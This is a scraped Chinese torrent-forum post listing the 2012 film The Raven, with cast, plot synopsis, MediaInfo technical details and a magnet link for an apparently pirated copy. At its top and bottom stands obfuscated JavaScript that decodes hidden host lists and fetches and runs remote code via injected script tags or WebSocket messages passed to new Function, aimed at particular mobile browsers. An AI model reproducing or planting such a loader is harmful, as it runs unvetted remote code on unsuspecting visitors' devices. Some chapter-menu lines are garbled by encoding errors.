乌鸦[中文字幕].The.Raven.2012.1080p.BluRay.x265.10bit.MNHD 3.82GB

版主小s 1月前 470

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 乌鸦 / 神探爱伦坡:黑鸦凶杀案(港) / 爱伦坡悬案:渡鸦疑云(台) / 神探爱伦坡:黑鸦疑云(台)

◎片 名 The Raven

◎年 代 2012

◎产 地 美国 / 西班牙 / 匈牙利 / 塞尔维亚

◎类 别 悬疑 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 2012-03-09(英国) / 2012-04-27(美国)

◎IMDb链接 https://www.imdb.com/title/tt1486192/

◎豆瓣评分 6.6/10 (13977人评价)

◎豆瓣链接 https://movie.douban.com/subject/3914547/

◎片 长 111分钟

◎导 演 詹姆斯·麦克特格 James McTeigue (id:1274963)

◎编 剧 Hannah Shakespeare Hannah Shakespeare (id:1439740)

◎演 员 约翰·库萨克 John Cusack (id:1018986)

卢克·伊万斯 Luke Evans (id:1276136)

爱丽丝·伊芙 Alice Eve (id:1004565)

布莱丹·格里森 Brendan Gleeson (id:1000078)

凯文·麦克纳利 Kevin McNally (id:1123046)

奥利弗·杰森-科恩 Oliver Jackson-Cohen (id:1315193)

山姆·哈兹尔丁 Sam Hazeldine (id:1332704)

帕姆·费里斯 Pam Ferris (id:1013974)

布兰登·柯伊尔 Brendan Coyle (id:1072602)

阿德里安·劳林斯 Adrian Rawlins (id:1141625)

大卫·勒格诺 Dave Legeno (id:1111773)

迈克尔·香农 Michael Shannon (id:1146777)

查丽蒂·维克菲尔德 Charity Wakefield (id:1319841)

伊恩·维果 Ian Virgo (id:1148983)

迈克尔·J·福蒂克 Michael J. Fourticq (id:1341482)

马特·戴维尔 Matt Devere (id:1414963)

谢尔盖·特里富诺维奇 Sergej Trifunovi? (id:1150450)

Milos Djuricic Milos Djuricic (id:1204731)

博扬·佩里奇 Bojan Peric (id:1262828)

安娜·索夫雷诺维奇 Ana Sofrenovic (id:1155730)

Andrew Hefler Andrew Hefler (id:1209505)

László Konter László Konter (id:1111869)

Mark C. Phelan Mark C. Phelan (id:1221668)

ádám F?ldi (id:1246905)

马泰·豪曼 Máté Haumann (id:1223421)

卢卡斯·比达尔 Lucas Vidal (id:1354478)

丹尼·鲁尔曼 Danny Ruhlmann (id:1296316)

◎标 签 悬疑 / 美国 / 惊悚 / 犯罪 / 推理 / 2012 / 哥特 / 剧情

◎简 介

影片虚构了爱伦·坡死前“神秘”的5天里发生的事情。

巴尔的摩发生了一件母女同时被害的残忍凶杀案,当地警官艾迈特(卢克·伊万斯 Luke Evans 饰)调查后发现凶手的犯罪手段和爱伦·坡(约翰·库萨克 John Cusack 饰)小说中的手段一模一样。正当爱伦·坡被叫去警局询问时发生了另一件凶手案,手法依旧和参考他的小说。了解到凶手的方法后,艾迈特邀请爱伦·坡担当顾问协助破案。而随着案件的进一步深入,艾迈特发现,爱伦·坡会成为这个残忍杀人凶手的下一个行凶目标。正当大家全力保护爱伦·坡的安全时,岂料凶手竟然绑架了的他情人艾米丽(爱丽丝·伊芙 Alice Eve 饰)。到底谁才是真正的凶手,爱伦·坡是不是能用自己的小说来揭开这场杀人的游戏呢?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 303146374136586664699004136477029467020 (0xE40FDE31DA8B1036797C44096302838C)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.82 GiB

  8. Duration : 1 h 50 min

  9. Overall bit rate : 4 929 kb/s

  10. Movie name : The Raven [2012] 1080p BluRay [email protected]

  11. Encoded date : UTC 2021-10-15 11:01:37

  12. Writing application : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 50 min

  21. Bit rate : 4 247 kb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.115

  31. Stream size : 3.29 GiB (86%)

  32. Title : [email protected]

  33. Writing library : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / total-frames=159490 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=22.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : AC-3

  44. Format/Info : Audio Coding 3

  45. Commercial name : Dolby Digital

  46. Codec ID : A_AC3

  47. Duration : 1 h 50 min

  48. Bit rate mode : Constant

  49. Bit rate : 640 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : L R C LFE Ls Rs

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 31.250 FPS (1536 SPF)

  54. Compression mode : Lossy

  55. Stream size : 508 MiB (13%)

  56. Language : English

  57. Service kind : Complete Main

  58. Default : Yes

  59. Forced : No


  60. Text #1

  61. ID : 3

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 41 min

  67. Bit rate : 28.2 kb/s

  68. Count of elements : 2257

  69. Stream size : 20.5 MiB (1%)

  70. Title : CHS

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 42 min

  81. Bit rate : 33.3 kb/s

  82. Count of elements : 2595

  83. Stream size : 24.4 MiB (1%)

  84. Title : ENG

  85. Language : English

  86. Default : No

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 1 h 41 min

  95. Bit rate : 28.9 kb/s

  96. Count of elements : 2257

  97. Stream size : 21.0 MiB (1%)

  98. Title : CHT

  99. Language : Chinese

  100. Default : No

  101. Forced : No


  102. Menu

  103. 00:00:00.000 : en:绗?01 绔?

  104. 00:06:00.652 : en:绗?02 绔?

  105. 00:11:40.158 : en:绗?03 绔?

  106. 00:17:30.007 : en:绗?04 绔?

  107. 00:22:07.117 : en:绗?05 绔?

  108. 00:26:51.693 : en:绗?06 绔?

  109. 00:30:40.088 : en:绗?07 绔?

  110. 00:34:42.831 : en:绗?08 绔?

  111. 00:40:36.392 : en:绗?09 绔?

  112. 00:44:30.668 : en:绗?10 绔?

  113. 00:50:37.034 : en:绗?11 绔?

  114. 00:57:26.610 : en:绗?12 绔?

  115. 01:01:36.902 : en:绗?13 绔?

  116. 01:06:30.570 : en:绗?14 绔?

  117. 01:12:28.261 : en:绗?15 绔?

  118. 01:18:23.866 : en:绗?16 绔?

  119. 01:24:18.929 : en:绗?17 绔?

  120. 01:27:40.464 : en:绗?18 绔?

  121. 01:34:01.344 : en:绗?19 绔?

  122. 01:40:39.742 : en:绗?20 绔?




复制代码


TAGS 惊悚 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:F05829C56E078192396E35A9525E2B9F1C6AFA6D

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};